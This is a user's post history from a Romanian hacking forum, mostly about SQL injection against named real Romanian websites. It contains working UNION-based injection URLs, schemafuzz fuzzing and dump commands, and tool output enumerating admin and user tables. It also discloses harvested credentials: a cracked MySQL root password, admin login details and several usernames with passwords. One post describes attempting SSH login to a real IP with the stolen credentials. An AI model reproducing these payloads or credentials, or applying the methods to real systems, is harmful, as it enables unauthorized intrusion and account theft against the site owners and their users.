Flubber
-
Posts
1765 -
Joined
-
Last visited
-
Days Won
11
Posts posted by Flubber
-
-
incearca aici daca ai mozilla firefox (poti seta tu timpul din cat in cat sa se schimbe proxy-ul)
-
-
http://www.aries.ro - vulnerabil
[+] URL:http://www.aries.ro/index.php?lang_id=2+AND+1=2+UNION+SELECT+darkc0de--
[+] Evasion Used: "+" "--"
[+] 02:20:54
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: aries_site
User: root@localhost
Version: 5.0.67
[+] Number of tables names to be fuzzed: 347
[+] Number of column names to be fuzzed: 277
[+] Searching for tables and columns...
[+] Found a table called: admin
[+] Now searching for columns inside table "admin"
[!] Found a column called:user
[!] Found a column called:pass
[!] Found a column called:id
[-] Done searching inside table "admin" for columns!
[+] Found a table called: company
[+] Now searching for columns inside table "company"
[!] Found a column called:id
[!] Found a column called:login
[-] Done searching inside table "company" for columns!
[+] Found a table called: mysql.user
[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!
[+] Found a table called: news
[+] Now searching for columns inside table "news"
[!] Found a column called:id
[-] Done searching inside table "news" for columns!
[+] Found a table called: users
[+] Now searching for columns inside table "users"
[!] Found a column called:password
[!] Found a column called:id
[!] Found a column called:email
[!] Found a column called:login
[-] Done searching inside table "users" for columns!
[-] [02:36:10]
[-] Total URL Requests 1733
[-] Done
am obtinut:
root:3c8c1a8e271e4bad (MySQL Hash) ---> root:toor
inca ceva: www.aries.ro/admin (user,id,pass din admin -> user: admin ; id: admin ; pass: 1)
am mai descoperit ca te poti conecta la aries.ro (prin DNS ip-ul este: 194.102.253.145) prin SSH 22, am incercat user-ul root, pass toor (din decriptarea hash-ului de mai sus) dar nu a mers.... acum am o nelamurire, toate userele astea unde le pot folosi? (nici la /admin nu au mers)
-
va recomand documentarele: Zeitgeist: The Movie si Zeitgesit: Addendum merita sa le vizionati, va v-a da o baza cum sa va aranjati lucrurile in capusor, acum depinde de fiecare
-
http://www.darkc0de.com/others/schemafuzz.py
python schemafuzz.py --fuzz -u "http://www.site.com/index.php?id=1"
dupa ce iti gaseste:
python schemafuzz.py --dump -u "http://www.site.com/index.php?id=1" -D database -T table -C column1,column2...column999
omu vad ca stie sa faca interogari si din browser. hai sa ne cacam in sus ca vezi doamne scripturile sunt naspa...te indobitocesc...my ass
super, multumesc mult, in sfarsit ceea ce asteptam desi TinKode are dreptate (stie el ce zice)
-
Ma tu crezi ca daca folosesti scripturi, programe rezolvi ceva?
Mai bine ai incerca sa faci tu cu mintea ta.. fara ajutorul nici unui program..
aha, ms oricum, voi incerca si varianta asta
-
+ http://www.apd.ro/admin/login.php , aoleuu xD
iar la ghicit coloane? are cineva un script care sa "rasfoiasca" (sa incerce diferite nume de coloane)
sau ce script-uri anume speciale de SQL Injection aveti? ce imi recomandati?
off: urasc ca nu pot sa schimb semnatura
-
unix_chro cred ca ai gresit postul este altu cu e-manele
asta este cu altceva oricum ... np .
Flubber check this out sper sa te ajute
mersi, sa le trimitem mail spunandu-le ca au vulnerabilitati?
-
http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(utilizator,0x3a,parola)%20from%20utilizatori--
uite..mai frumos
mid:midul
laur:laur
stefan_carstea:nicoleta
frumos, e bun si "0x3a" asta la ceva, macar la despartit
alea 3 banuiesc ca sunt MD5 si atat nu? nu sunt salty md5
thx
-
daca e versiunea 4 nu ai ce sa ii faci decat sa ghicesti tabelele ......e mai greu
pe asta l-am luat si eu acum cateva zile si i-am dat pace cand am vazut ca are versiunea 4
am inteles, ms pentru ajutor
-
Salut baieti,
am incercat SQL Injection in: http://proiecte.nipne.ro/ am aflat ca foloseste versiunea 4 ( http://proiecte.nipne.ro/pn2/index_en.php?id=1+AND+1=0+UNION+SELECT+ALL+concat_ws(0x3a,version(),user(),database())-- ) si am ajuns la stadiul unde trebuie sa ghicesc numele tabelului ( http://proiecte.nipne.ro/pn2/index_en.php?id=-1+UNION+SELECT+ALL+group_concat(schema_name)+from+information_schema.schemata-- ) ...
putin ajutor?
P.S.: daca nu am postat unde trebuia, rog un moderator/administrator sa imi mute post-ul si topic-ul, multumesc
-
<div class='quotetop'>QUOTE("YonutzW")</div>
sau cu firefox : View Page Source .. pt html nu ?intocmai sau cu IE (Internet Explorer)
-
e c++ oare cat i-a luat lu ala sa faca virusu ?
Host pentru fisiere [numai pentru membrii rst]
in Programe hacking
Posted
Multumim!
Am urcat cateva chestii asa... mai neinteresante dar merg